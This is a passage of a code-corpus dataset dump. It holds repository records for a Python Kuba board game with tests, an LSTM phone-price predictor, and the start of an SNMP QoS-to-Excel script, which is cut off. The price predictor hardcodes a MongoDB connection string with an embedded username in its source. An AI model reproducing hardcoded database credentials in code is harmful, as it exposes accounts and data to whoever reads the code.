repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
JacobO1994/Kuba | https://github.com/JacobO1994/Kuba | 99845c99123823753fefd34f4126f3e31c234b73 | c565906497e6cdd55a18c3bde700e1c254189140 | f66f7ab7e87d3b9316a0e40f94c7b6586e8f2fc5 | refs/heads/main | 2023-08-05T06:57:25.166823 | 2021-08-24T14:02:36 | 2021-08-24T14:02:36 | 376,950,973 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7805092334747314,
"alphanum_fraction": 0.7805092334747314,
"avg_line_length": 141.375,
"blob_id": "04c6086fb53b7e0a3bf8aaf61729238c8c895f54",
"content_id": "5ae25a2067f41929cd05a0b92495c52aa8f4bc91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1139,
"license_type": "no_license",
"max_line_length": 877,
"num_lines": 8,
"path": "/README.md",
"repo_name": "JacobO1994/Kuba",
"src_encoding": "UTF-8",
"text": "# Kuba\nA python implementation of the board-game, Kuba.\n\n## Objective\nA player wins by pushing off and capturing seven neutral red stones or by pushing off all of the opposing stones. A player who has no legal moves available has lost the game.\n\n## Game Rules\nWith alternating turns, players move a single marble in any orthogonal direction. In order to slide a marble, however, there must be access to it. For example, to slide a marble to the left, the cell just to the right if it must be vacant. If there are other marbles; your own, your opponent's or the neutral red ones; in the direction of your move at the cell you are moving to, those marbles are pushed one cell forward along the axis of your move. Up to six marbles can be pushed by your one marble on your turn. Although a player cannot push off one of his own marbles, any opposing counters that are pushed off are removed from the game and any neutral counters that are pushed off are captured by the pushing player to add to his or her store of captured neutral red marbles. If you manage to push off a neutral or opposing marble, you are entitled to another turn.\n"
},
{
"alpha_fraction": 0.4649425148963928,
"alphanum_fraction": 0.4951149523258209,
"avg_line_length": 41.43902587890625,
"blob_id": "5108687279abeaf41c5409174a0bb2abbe1132aa",
"content_id": "41e612fdffbdf6c70b471afb4257118535245c6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3480,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 82,
"path": "/test-KubaGame.py",
"repo_name": "JacobO1994/Kuba",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom KubaGame import *\n\n\nclass MyTestCase(unittest.TestCase):\n def test_winner(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Jake\", (6, 5), \"F\")\n game.make_move(\"Kenna\", (0, 6), \"B\")\n game.make_move(\"Jake\", (4, 5), \"L\")\n game.make_move(\"Kenna\", (0, 5), \"B\")\n game.make_move(\"Jake\", (4, 4), \"L\")\n game.make_move(\"Kenna\", (2, 6), \"L\")\n game.make_move(\"Jake\", (4, 3), \"L\")\n game.make_move(\"Kenna\", (2, 5), \"L\")\n game.make_move(\"Jake\", (4, 2), \"L\")\n game.make_move(\"Kenna\", (2, 4), \"L\")\n game.make_move(\"Jake\", (4, 1), \"L\")\n game.make_move(\"Kenna\", (2, 3), \"L\")\n game.make_move(\"Jake\", (0, 0), \"B\")\n game.make_move(\"Kenna\", (5, 0), \"R\")\n game.make_move(\"Jake\", (4, 0), \"F\")\n game.make_move(\"Kenna\", (5, 1), \"R\")\n game.make_move(\"Jake\", (3, 0), \"R\")\n game.make_move(\"Kenna\", (5, 2), \"R\")\n game.make_move(\"Jake\", (3, 1), \"R\")\n game.make_move(\"Kenna\", (5, 3), \"R\")\n game.make_move(\"Jake\", (3, 2), \"R\")\n game.make_move(\"Kenna\", (5, 4), \"R\")\n game.make_move(\"Jake\", (3, 3), \"R\")\n game.make_move(\"Kenna\", (6, 0), \"F\")\n game.make_move(\"Jake\", (3, 4), \"R\")\n self.assertEqual(\"Jake\", game.get_winner())\n\n def test_capture_one_left_board(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Jake\", (6, 6), 'F')\n game.make_move(\"Kenna\", (0, 6), 'B')\n game.make_move(\"Jake\", (5, 6), 'F')\n game.make_move(\"Kenna\", (6, 0), 'R')\n game.make_move(\"Jake\", (3, 6), 'L')\n game.make_move(\"Kenna\", (6, 1), 'R')\n game.make_move(\"Jake\", (3, 5), 'L')\n self.assertEqual(1, game.get_captured(\"Jake\"))\n\n def test_capture_one_right_board(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Kenna\", (6, 0), 'F')\n game.make_move(\"Jake\", (0, 0), 'R')\n game.make_move(\"Kenna\", (5, 0), 'F')\n game.make_move(\"Jake\", (0, 1), \"R\")\n game.make_move(\"Kenna\", (3, 0), \"R\")\n game.make_move(\"Jake\", (0, 2), \"R\")\n game.make_move(\"Kenna\", (3, 1), \"R\")\n self.assertEqual(1, game.get_captured(\"Kenna\"))\n\n def test_capture_one_top_board(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Kenna\", (6, 0), 'R')\n game.make_move(\"Jake\", (0, 0), 'B')\n game.make_move(\"Kenna\", (6, 1), 'R')\n game.make_move(\"Jake\", (1, 0), 'B')\n game.make_move(\"Kenna\", (6, 3), 'F')\n game.make_move(\"Jake\", (2, 0), 'B')\n game.make_move(\"Kenna\", (5, 3), 'F')\n self.assertEqual(1, game.get_captured(\"Kenna\"))\n\n def test_ko_rule(self):\n \"\"\" Tests if the Ko Rule is violated & handled properly\"\"\"\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Kenna\", (6, 0), 'F')\n game.make_move(\"Jake\", (0, 0), 'B')\n game.make_move(\"Kenna\", (5, 0), 'F')\n game.make_move(\"Jake\", (1, 0), 'B')\n test = game.make_move(\"Kenna\", (5, 0), 'F')\n self.assertEqual(False, test) # Tests that the move results in a Ko rule violation & thus False result\n player_remains_up = game.get_current_turn()\n self.assertEqual(\"Kenna\", player_remains_up) # This test ensures that the player stays up to move after attempting a Ko-Rule violation\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.45618557929992676,
"alphanum_fraction": 0.46484270691871643,
"avg_line_length": 41.38655471801758,
"blob_id": "c088eb19b1701061a7006e5f24ae633d1604fd9a",
"content_id": "0d99c497bb5766bb1308e1a7c94ed3158c5d7e5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15132,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 357,
"path": "/KubaGame.py",
"repo_name": "JacobO1994/Kuba",
"src_encoding": "UTF-8",
"text": "# Author: Jacob Ogle\n# Description: A program that allows two users to play the board game, Kuba.\nimport copy\n\n\nclass Player:\n \"\"\"A class that represents the players of the game\"\"\"\n\n def __init__(self, player_data_tuple):\n \"\"\"Class initializer for player data\"\"\"\n self._name = player_data_tuple[0]\n self._piece = player_data_tuple[1]\n self._number_pieces_on_board = 8\n self._current_red_holdings = 0\n self._player_first_move = True\n\n def get_name(self):\n \"\"\"Returns the players name\"\"\"\n return self._name\n\n def get_piece(self):\n \"\"\"Returns the player piece type in a string: X or O\"\"\"\n return self._piece\n\n def get_number_pieces_on_board(self):\n \"\"\"Returns the number of pieces left on the board for the player\"\"\"\n return self._number_pieces_on_board\n\n def get_current_red_holdings(self):\n \"\"\"Returns the number of red marbles the player is holding\"\"\"\n return self._current_red_holdings\n\n def get_is_first_move(self):\n \"\"\"Returns the value of the players first move\"\"\"\n return self._player_first_move\n\n def increment_red_holding(self):\n \"\"\"Increments the red holding by one of the player\"\"\"\n self._current_red_holdings += 1\n\n def set_is_first_move_to_false(self):\n \"\"\"Sets the players first move bool value to False once player makes first move\"\"\"\n self._player_first_move = False\n\n\nclass KubaGame:\n \"\"\" Class representing the logical components of the Kuba game\"\"\"\n\n def __init__(self, player_one_name_and_color, player_two_name_and_color):\n \"\"\"Class initializer that takes player name and color as tuple and initializes the board\"\"\"\n self._board = [\n ['N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N'],\n ['N', 'W', 'W', ' ', ' ', ' ', 'B', 'B', 'N'],\n ['N', 'W', 'W', ' ', 'R', ' ', 'B', 'B', 'N'],\n ['N', ' ', ' ', 'R', 'R', 'R', ' ', ' ', 'N'],\n ['N', ' ', 'R', 'R', 'R', 'R', 'R', ' ', 'N'],\n ['N', ' ', ' ', 'R', 'R', 'R', ' ', ' ', 'N'],\n ['N', 'B', 'B', ' ', 'R', ' ', 'W', 'W', 'N'],\n ['N', 'B', 'B', ' ', ' ', ' ', 'W', 'W', 'N'],\n ['N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N']\n ]\n self._board_history = []\n self._player_one = Player(player_one_name_and_color)\n self._player_two = Player(player_two_name_and_color)\n self._current_players = [self._player_one, self._player_two]\n self._first_move_made = False\n self._current_turn = None\n self._winner = None\n self._move_counter = 0\n\n def set_current_turn(self, player):\n \"\"\"Sets the current turn to the player\"\"\"\n self._current_turn = player.get_name()\n\n def get_current_turn(self):\n \"\"\"\" Returns the current turns player Name if there is one, returns none otherwise\"\"\"\n if self._current_turn is None:\n return None\n return self._current_turn\n\n def get_winner(self):\n \"\"\"Returns the name of the winner if there is one, None otherwise\"\"\"\n if self._winner is None:\n return None\n return self._winner\n\n def get_captured(self, player_name):\n \"\"\"Returns the passed players current red marble holdings\"\"\"\n player = [i for i in self._current_players if i.get_name() == player_name]\n if player[0].get_current_red_holdings() == 0:\n return 0\n else:\n return player[0].get_current_red_holdings()\n\n def get_off_board(self, coordinates):\n \"\"\" Checks if a move will push a piece off the board\"\"\"\n y = coordinates[0]\n x = coordinates[1]\n if self._board[y][x] == 'N':\n return 'N'\n else:\n return False\n\n def get_marble(self, coordinates):\n \"\"\"Returns the marble at the passed coordinates if theres is one, otherwise, returns 'X' \"\"\"\n y = coordinates[0] + 1\n x = coordinates[1] + 1\n if self._board[y][x] == 'W' or self._board[y][x] == 'B' or self._board[y][x] == 'R':\n return self._board[y][x]\n elif self._board[y][x] == ' ':\n return 'X'\n\n def get_marble_count(self):\n \"\"\" Returns the count of marbles on the board in a tuple (W,B,R) \"\"\"\n white = 0\n black = 0\n red = 0\n for i in self._board:\n for j in i:\n if j == 'W':\n white += 1\n elif j == 'B':\n black += 1\n elif j == 'R':\n red += 1\n return white, black, red\n\n def ko_rule_check(self):\n \"\"\"Checks if the player making the current move is violating the Ko rule - meaning pushing\n the board back to the previous state\"\"\"\n if self._move_counter < 3:\n return True\n if self._board_history[-1] == self._board_history[-3]:\n print(\"There was a KO Rule violation - board reset - player re-try new move\")\n self._board = self._board_history[-2]\n return False\n return True\n\n def check_valid_move(self, player_match, desired_move, direction):\n \"\"\"\n A series of logical checks in-line with the rules of Kuba to ensure a move is valid\n Takes player match, the desired move coordinates and direction of desired move a parameters.\n \"\"\"\n valid_directions = ['F', 'B', 'R', 'L']\n y = desired_move[0]\n x = desired_move[1]\n if self._first_move_made is False: # Updates the first move status when game is started\n self._first_move_made = True\n self.set_current_turn(player_match[0])\n if self.get_winner() is not None:\n return False\n if player_match[0].get_name() != self.get_current_turn():\n print(\"Sorry, it is not this players turn. Please change player and try again.\")\n return False\n if desired_move[0] < 1 or desired_move[0] > 7: # Checking bounds of the board\n return False\n if desired_move[1] < 1 or desired_move[1] > 7: # Checking bounds of the board\n return False\n if direction not in valid_directions: # Ensuring the direction is valid\n return False\n if self._board[y][x] != player_match[0].get_piece(): # Checking piece to be moved isn't the current players\n return False\n if direction == 'F':\n if self._board[y + 1][x] == 'N' or self._board[y + 1][x] == ' ':\n pass\n else:\n return False\n if direction == 'B':\n if self._board[y - 1][x] == 'N' or self._board[y - 1][x] == ' ':\n pass\n else:\n return False\n if direction == 'R':\n if self._board[y][x - 1] == 'N' or self._board[y][x - 1] == ' ':\n pass\n else:\n return False\n if direction == 'L':\n if self._board[y][x + 1] == 'N' or self._board[y][x + 1] == ' ':\n pass\n else:\n return False\n return True\n\n def check_opponent_pieces(self, current_player, opposing_player):\n \"\"\"\n Checks if the opponent has any pieces to move on the board, if not returns False, otherwise return True.\n Function receives the player object of the opponent after the player makes their move. Will update\n the current player to be the winner if true.\n \"\"\"\n marble_counts = self.get_marble_count()\n if opposing_player.get_piece() == 'W':\n if marble_counts[0] == 0:\n self._winner = current_player.get_name()\n return False\n else:\n return True\n elif opposing_player.get_piece() == 'B':\n if marble_counts[1] == 0:\n self._winner = current_player.get_name()\n return False\n else:\n return True\n\n def next_piece_tracker(self, x_value, y_value, move_direction):\n \"\"\"\n A function to get the next piece on the board- used for checking the rows or columns for make move.\n Takes the x_value, y_value and move direction and will get the next piece based on the direction.\n \"\"\"\n if move_direction == \"F\":\n if self._board[y_value - 1][x_value] == 'N':\n return 'N'\n elif self._board[y_value - 1][x_value] == ' ':\n return ' '\n return False\n elif move_direction == \"B\":\n if self._board[y_value + 1][x_value] == 'N':\n return 'N'\n elif self._board[y_value + 1][x_value] == ' ':\n return ' '\n return False\n elif move_direction == \"R\":\n if self._board[y_value][x_value + 1] == 'N':\n return 'N'\n elif self._board[y_value][x_value + 1] == ' ':\n return ' '\n return False\n elif move_direction == \"L\":\n if self._board[y_value][x_value - 1] == 'N':\n return 'N'\n elif self._board[y_value][x_value - 1] == ' ':\n return ' '\n return False\n\n def make_move(self, player_name, coordinates, direction):\n \"\"\"\n Takes a player name, tuple coordinates (X, Y), and direction to move { F, R, L, R } if the move is valid,\n the function will make the move and update winner status if one is determined, players holdings, next player\n turn.\n \"\"\"\n player_match = [i for i in self._current_players if i.get_name() == player_name]\n other_player = [i for i in self._current_players if i not in player_match]\n desired_move = coordinates\n y = desired_move[0] + 1\n x = desired_move[1] + 1\n board_adjusted_coords = (y, x) # (row, col)\n if self.check_valid_move(player_match, board_adjusted_coords, direction) is False:\n return False\n else:\n if direction == 'F':\n if self._board[y - 1][x] == ' ':\n self._board[y][x] = ' '\n self._board[y - 1][x] = player_match[0].get_piece()\n else:\n y_base = y\n y_pointer = y_base - 1\n while y_pointer > 0:\n if self._board[y_pointer][x] == 'N' or self._board[y_pointer][x] == ' ':\n break\n else:\n y_pointer -= 1\n if self._board[y_pointer][x] == 'N':\n if self._board[y_pointer + 1][x] == 'R':\n player_match[0].increment_red_holding()\n diff = y_base - y_pointer\n while diff > 0:\n self._board[y_pointer][x] = self._board[y_pointer + 1][x]\n diff -= 1\n y_pointer += 1\n self._board[y][x] = ' '\n self._board[0][x] = 'N'\n elif direction == 'B':\n if self._board[y + 1][x] == ' ':\n self._board[y][x] = ' '\n self._board[y + 1][x] = player_match[0].get_piece()\n else:\n y_base = y\n y_pointer = y_base + 1\n while y_pointer < 7:\n if self._board[y_pointer][x] == 'N' or self._board[y_pointer][x] == ' ':\n break\n else:\n y_pointer += 1\n if self._board[y_pointer][x] == 'N':\n if self._board[y_pointer - 1][x] == 'R':\n player_match[0].increment_red_holding()\n diff = y_pointer - y_base\n while diff > 0:\n self._board[y_pointer][x] = self._board[y_pointer - 1][x]\n diff -= 1\n y_pointer -= 1\n self._board[y][x] = ' '\n self._board[8][x] = 'N'\n elif direction == 'L':\n if self._board[y][x - 1] == ' ':\n self._board[y][x - 1] = player_match[0].get_piece()\n self._board[y][x] = ' '\n else:\n x_base = x\n x_pointer = x_base - 1\n while x_pointer >= 0:\n if self._board[y][x_pointer] == 'N' or self._board[y][x_pointer] == ' ':\n break\n else:\n x_pointer -= 1\n counter = 0\n diff = x_base - x_pointer\n if self._board[y][x_pointer] == 'N':\n if self._board[y][x_pointer + 1] == 'R':\n player_match[0].increment_red_holding()\n while counter < diff:\n self._board[y][x_pointer] = self._board[y][x_pointer + 1]\n x_pointer += 1\n counter += 1\n self._board[y][x_base] = ' '\n self._board[y][0] = 'N'\n elif direction == 'R':\n if self._board[y][x + 1] == ' ':\n self._board[y][x] = ' '\n self._board[y][x + 1] = player_match[0].get_piece()\n else:\n x_base = x\n x_pointer = x_base + 1\n while x_pointer <= 7:\n if self._board[y][x_pointer] == 'N' or self._board[y][x_pointer] == ' ':\n break\n else:\n x_pointer += 1\n counter = 0\n diff = x_pointer - x_base\n if self._board[y][x_pointer] == 'N':\n if self._board[y][x_pointer - 1] == 'R':\n player_match[0].increment_red_holding()\n while counter < diff:\n self._board[y][x_pointer] = self._board[y][x_pointer - 1]\n x_pointer -= 1\n counter += 1\n self._board[y][x_base] = ' '\n self._board[y][8] = 'N'\n self._board_history.append(copy.deepcopy(self._board))\n if not self.check_opponent_pieces(player_match[0], other_player[0]):\n return False\n if self.ko_rule_check() is False:\n return False\n self.set_current_turn(other_player[0])\n self._move_counter += 1\n if player_match[0].get_current_red_holdings() == 7:\n self._winner = player_match[0].get_name()\n return True\n\n def print_board(self):\n \"\"\"Prints the current state of the board.\"\"\"\n print('===============')\n for i in self._board:\n print(\"|\" + i[0] + \"|\" + i[1] + \"|\" + i[2] + \"|\" + i[3] + \"|\" + i[4] + \"|\" + i[5] + \"|\" + i[6] + \"|\" + i[\n 7] + \"|\" + i[8] + \"|\")\n print('===============')\n"
}
] | 3 |
Chamikacp/Time-Series-Prediction-with-LSTM | https://github.com/Chamikacp/Time-Series-Prediction-with-LSTM | edb1e67a9bd2bff126222cd9f3d96f996f6786fc | 61cbc71e81af636751a1787623df4422cb7eaf06 | cdd0d0f3c730bb983aa0c185e9a4de680de91bc0 | refs/heads/main | 2023-07-24T18:14:52.960861 | 2021-09-05T17:10:55 | 2021-09-05T17:10:55 | 403,367,460 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6886109113693237,
"alphanum_fraction": 0.6978275179862976,
"avg_line_length": 37.71241760253906,
"blob_id": "5ff8d8b7d11aba5fc8ff3bc9f352dd27a447f708",
"content_id": "320b46198629e20f0a5fa0a7cf2bd4c7486a3f58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6076,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 153,
"path": "/Mobiuler Price Prediction.py",
"repo_name": "Chamikacp/Time-Series-Prediction-with-LSTM",
"src_encoding": "UTF-8",
"text": "from pymongo import MongoClient\r\nimport numpy\r\nimport matplotlib.pyplot as pyPlot\r\nimport math\r\nimport pandas\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom keras.models import Sequential\r\nfrom keras.layers import LSTM\r\nfrom keras.layers import Dense\r\n\r\n# To fix a randomSeed\r\nnumpy.random.seed(7)\r\n\r\n# Create connection with MONGODB\r\nclient = MongoClient(\"mongodb+srv://mobiuler:[email protected]/test?retryWrites=true&w=majority\")\r\nmongoDb = client.get_database('Mobiuler')\r\nmCollection = mongoDb.get_collection('price_details')\r\n\r\n# List of available phones in database\r\n# availablePhones = [\"Apple iPhone Xr\"]\r\navailablePhones = []\r\nfor doc in mCollection.find():\r\n name = str(doc['phone_name'])\r\n availablePhones.append(name)\r\n\r\nprint(availablePhones)\r\n\r\n\r\ndef prediction():\r\n # Assigning the dataFrame\r\n mobiulerDataFrame = pandas.DataFrame(allPrices)\r\n mobiulerDataFrame.Date = pandas.to_datetime(mobiulerDataFrame.Date)\r\n mobiulerDataFrame = mobiulerDataFrame.set_index(\"Date\")\r\n\r\n # Creating mobiulerDataset\r\n mobiulerDataset = mobiulerDataFrame.values\r\n\r\n # Visualize the price history\r\n pyPlot.figure(figsize=(16, 8))\r\n pyPlot.title(phoneModel + ' Price History', fontsize=25)\r\n pyPlot.plot(mobiulerDataFrame['Price'])\r\n pyPlot.xlabel('Date', fontsize=18)\r\n pyPlot.ylabel('Price', fontsize=18)\r\n pyPlot.show()\r\n\r\n # Normalizing the created mobiulerDataset\r\n mobiulerScaler = MinMaxScaler(feature_range=(0, 1))\r\n mobiulerDataset = mobiulerScaler.fit_transform(mobiulerDataset)\r\n\r\n # Spliting the mobiulerDataset into trainData and testData\r\n trainingDatasetSize = int(len(mobiulerDataset) * 0.67)\r\n testingDatasetSize = len(mobiulerDataset) - trainingDatasetSize\r\n trainData = mobiulerDataset[0:trainingDatasetSize, :]\r\n testData = mobiulerDataset[trainingDatasetSize:len(mobiulerDataset), :]\r\n\r\n # To Convert create a matrix using NumPy\r\n def createNewDataset(newDataset, backStep):\r\n dataXArray, dataYArray = [], []\r\n for i in range(len(newDataset) - backStep):\r\n a = newDataset[i:(i + backStep), 0]\r\n dataXArray.append(a)\r\n dataYArray.append(newDataset[i + backStep, 0])\r\n return numpy.array(dataXArray), numpy.array(dataYArray)\r\n\r\n # Reshaping the x,y data to t and t+1\r\n backStep = 1\r\n trainXData, trainYData = createNewDataset(trainData, backStep)\r\n testXData, testYData = createNewDataset(testData, backStep)\r\n\r\n # Reshaping the inputData [samples, time steps, features]\r\n trainXData = numpy.reshape(trainXData, (trainXData.shape[0], 1, trainXData.shape[1]))\r\n testXData = numpy.reshape(testXData, (testXData.shape[0], 1, testXData.shape[1]))\r\n\r\n # Creating the LSTM model and fit the model\r\n model = Sequential()\r\n model.add(LSTM(4, input_shape=(1, backStep)))\r\n model.add(Dense(1))\r\n model.compile(loss='mean_squared_error', optimizer='adam')\r\n model.fit(trainXData, trainYData, epochs=100, batch_size=1, verbose=2)\r\n\r\n # Predicting Train and Test Data\r\n trainPrediction = model.predict(trainXData)\r\n testPrediction = model.predict(testXData)\r\n\r\n # Inverting the predicted data\r\n trainPrediction = mobiulerScaler.inverse_transform(trainPrediction)\r\n trainYData = mobiulerScaler.inverse_transform([trainYData])\r\n testPrediction = mobiulerScaler.inverse_transform(testPrediction)\r\n testYData = mobiulerScaler.inverse_transform([testYData])\r\n\r\n # Calculating the RootMeanSquaredError (RMSE)\r\n phoneTrainingScore = math.sqrt(mean_squared_error(trainYData[0], trainPrediction[:, 0]))\r\n print('Train Score of a phone: %.2f RMSE' % phoneTrainingScore)\r\n phoneTestingScore = math.sqrt(mean_squared_error(testYData[0], testPrediction[:, 0]))\r\n print('Test Score of a phone: %.2f RMSE' % phoneTestingScore)\r\n\r\n # Shifting the trainData for plotting\r\n trainPredictionPlot = numpy.empty_like(mobiulerDataset)\r\n trainPredictionPlot[:, :] = numpy.nan\r\n trainPredictionPlot[backStep:len(trainPrediction) + backStep, :] = trainPrediction\r\n\r\n # Shifting the testData for plotting\r\n testPredictionPlot = numpy.empty_like(mobiulerDataset)\r\n testPredictionPlot[:, :] = numpy.nan\r\n testPredictionPlot[len(trainPrediction) + (backStep * 2) - 1:len(mobiulerDataset) - 1, :] = testPrediction\r\n\r\n # To Plot the available all data,training and tested data\r\n pyPlot.figure(figsize=(16, 8))\r\n pyPlot.title(phoneModel + ' Predicted Price', fontsize=25)\r\n pyPlot.plot(mobiulerScaler.inverse_transform(mobiulerDataset), 'b', label='Original Prices')\r\n pyPlot.plot(trainPredictionPlot, 'r', label='Trained Prices')\r\n pyPlot.plot(testPredictionPlot, 'g', label='Predicted Prices')\r\n pyPlot.legend(loc='upper right')\r\n pyPlot.xlabel('Number of Days', fontsize=18)\r\n pyPlot.ylabel('Price', fontsize=18)\r\n pyPlot.show()\r\n\r\n # To PREDICT FUTURE VALUES\r\n last_month_price = testPrediction[-1]\r\n last_month_price_scaled = last_month_price / last_month_price\r\n next_month_price = model.predict(numpy.reshape(last_month_price_scaled, (1, 1, 1)))\r\n oldPrice = math.trunc(numpy.ndarray.item(last_month_price))\r\n newPrice = math.trunc(numpy.ndarray.item(last_month_price * next_month_price))\r\n print(\"Last Month Price : \", oldPrice)\r\n print(\"Next Month Price : \", newPrice)\r\n\r\n # Updating the predicted price in database\r\n mobileName = mCollection.find_one({'phone_name': phoneModel})\r\n if bool(mobileName):\r\n price_update = {\r\n 'predicted_price': newPrice\r\n }\r\n\r\n mCollection.update_one({'phone_name': phoneModel}, {'$set': price_update})\r\n\r\n print(phoneModel + \" PRICE UPDATED\")\r\n\r\n # to clear the array\r\n allPrices.clear()\r\n\r\n\r\nallPrices = []\r\n\r\n# To find the previous prices of a smartphone\r\nfor phoneModel in availablePhones:\r\n\r\n for x in mCollection.find({'phone_name': phoneModel}):\r\n prices = x['prices']\r\n for y in prices:\r\n allPrices.append(y)\r\n\r\n prediction()\r\n"
}
] | 1 |
ileammontoya/Proyecto-OIDs | https://github.com/ileammontoya/Proyecto-OIDs | 5b95d637536aa9cbb9e49c0be128c86a0c9385e9 | b40039a4d0939c7ea8e112e9110a0c17d339993a | 85e1f76e7817fe51a41e97e6a378ec40fb3f2e5e | refs/heads/master | 2021-01-25T12:23:48.425631 | 2018-03-01T19:51:31 | 2018-03-01T19:51:31 | 123,469,114 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6300246715545654,
"alphanum_fraction": 0.6626763939857483,
"avg_line_length": 41.93600082397461,
"blob_id": "e83437ea1cd64875c17d1314fbff42cf97922a41",
"content_id": "18ef0556dbc627e126d959798304352e31b72137",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21469,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 500,
"path": "/Excels/OIDExcelGuatemala.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport os\nimport glob\nimport os\nimport stat\nimport openpyxl\nfrom openpyxl.styles import Font, PatternFill, Border, Alignment, Side\n\ntestcounter=0\n\ntitlecolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\tstart_color='FF0000',\n\t\t\t\t\t\tend_color='FF0000')\ntitlefont = Font(size=15,\n\t\t\t\tcolor='FFFFFF')\n\ncellalignment = Alignment(horizontal='center',\n\t\t\t\t\t\t\tvertical='center')\n\nsecondcolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\t\tstart_color='000000',\n\t\t\t\t\t\t\tend_color='000000')\n\nsecondfont = Font(color='FFFFFF')\n\ncellcolor = PatternFill(fill_type='lightGrid',\n\t\t\t\t\t \tstart_color='FFFFFF',\n\t\t\t\t\t \tend_color='FFFFFF')\n\nthin_border = Border(left=Side(style='thin'), \n right=Side(style='thin'), \n top=Side(style='thin'), \n bottom=Side(style='thin'))\n\n\n#Ciclos redundantes para buscar los indices de cada OID dependiendo de la interfaz donde se encuentra aplicada\n#Los primeros dos ciclos y el if dan la relacion de la interfaz y el indice de calidad de servicio\ndef writeexcel(diccionarios,fila,host):\n\tglobal testcounter\n\tinterestingclasses=['Enrutamiento-Senalizacion','EnrutamientoSenalizacion','Datos_VPN_Internet_plus','Ingenieria','Datos_VPN','Video','Aplicaciones-Tiempo-Real', 'class-default']\n\tqosinterfacepolicy=[]\n\tqospolicycontrol=0\n\t#inind==diccionarios[0]\n\t#inqosind==diccionarios[1]\n\t#mapas==diccionarios[2]\n\t#inclaseind==diccionarios[3]\n\t#counterprev==diccionarios[4]\n\t#gaugeprev==diccionarios[5]\n\t#counterpost==diccionarios[6]\n\t#gaugepost==diccionarios[7]\n\t#ifipindex==diccionarios[8]\n\t#ifqosindex==diccionarios[9]\n\t#queueingindex==diccionarios[10]\n\t#queueingcurrent==diccionarios[11]\n\t#queueingmax==diccionarios[12]\n\t#queueingdiscards==diccionarios[13]\n\n\t#Ciclos para juntar Interfaz con la politica que esta aplicada\n\t#se hicieron en el mismo orden que los ciclos de impresion en excel asi que el orden las politicas e interfaces coindiden en esta lista y en el excel\n\tfor key in diccionarios[0]:\n\t\t\tfor item in diccionarios[1]:\n\t\t\t\tif diccionarios[0][key][0]==diccionarios[1][item][1]:\n\t\t\t\t\tfor extra in diccionarios[3]:\n\t\t\t\t\t\tif diccionarios[1][item][0] in diccionarios[3][extra][0]:\n\t\t\t\t\t\t\tfor indice in diccionarios[9]:\n\t\t\t\t\t\t\t\tif diccionarios[3][extra][1]==diccionarios[9][indice][0]:\n\t\t\t\t\t\t\t\t\tqosinterfacepolicy.append(diccionarios[0][key][1]+' - Policy-Map: '+str(diccionarios[9][indice][1]))\n\t\t\t\t\t\t\t\t\t# test the list in a file\n\t\t\t\t\t\t\t\t\t# my_file=open(\"oidtest\",\"a\")\n\t\t\t\t\t\t\t\t\t# my_file.write(diccionarios[0][key][1]+' - Policy-Map: '+str(diccionarios[9][indice][1]))\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t# my_file.write('\\n')\n\t\t\t\t\t\t\t\t\t# my_file.write('\\n')\n\t\t\t\t\t\t\t\t\t# my_file.close()\n\n\n\n\tfor key in diccionarios[0]:\n\t\tfor item in diccionarios[1]:\n\t\t\t#OLD FILTER FOR CONTROL PLANE AND VLANS\n\t\t\t# if diccionarios[0][key][0]==diccionarios[1][item][1] and (diccionarios[0][key][1]=='Control Plane' or 'Vlan' in diccionarios[0][key][1]):\n\t\t\t# \tsheet.cell(row=fila,column=1).value=host+' - '+diccionarios[8]['value1'][0]\n\t\t\t# \tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=4)\n\t\t\t# \tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t# \tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t# \tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t# \tsheet.row_dimensions[fila].height=20\n\t\t\t# \tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t# 